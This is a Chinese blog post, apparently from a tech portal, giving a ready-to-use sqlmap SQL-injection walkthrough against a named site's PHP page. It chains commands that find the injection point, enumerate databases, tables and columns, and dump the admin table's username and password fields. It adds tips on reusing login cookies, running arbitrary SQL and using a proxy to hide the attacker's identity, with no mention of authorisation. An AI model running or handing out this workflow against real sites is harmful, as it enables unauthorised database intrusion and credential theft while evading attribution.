sqlmap注入常见用法一条龙

安全 数据安全
sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面,其实真正用起来也就5,6句,也不会太复杂。

sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:

检查注入点sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列数据库信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定库名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定库名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定库名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有几个参数可能会用到,直接加在***面就可以了,更多详细参数见官方文档:

--cookie=COOKIE 在需要登录的地方,需要登录后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等

--sql-query=QUERY 执行一个sql语句,不一定支持

过程的几张图如下:

sqlmap注入常见用法一条龙

sqlmap注入常见用法一条龙

sqlmap注入常见用法一条龙

 

责任编辑:蓝雨泪 来源: 博客
相关推荐

2012-11-08 14:28:16

2013-12-27 09:00:27

编程语言

2011-05-24 16:04:34

打印机技巧

2011-06-17 15:16:46

打印机技巧

2021-12-28 10:51:32

自动驾驶技术安全

2020-06-10 16:32:43

百度谷歌老照片修复

2020-04-20 17:16:58

Python数据处理

2020-07-16 13:00:18

人工智能机器学习技术

2022-12-31 18:22:23

2020-07-20 09:49:56

开源技术 趋势

2021-08-27 10:04:53

机器人

2013-06-27 10:26:53

Sqlmap注入

2020-04-17 14:16:10

SQL数据库HTTP

2022-10-25 14:01:46

AI游戏

2015-03-25 19:15:08

2022-07-13 08:49:27

DevOpsKubeSphere

2010-04-13 16:57:01

2022-12-02 17:37:57

AIOpenAI游戏

2019-03-28 10:09:49

内存CPU硬盘

2011-03-21 17:19:12

LAMPUbuntu
点赞
收藏

51CTO技术栈公众号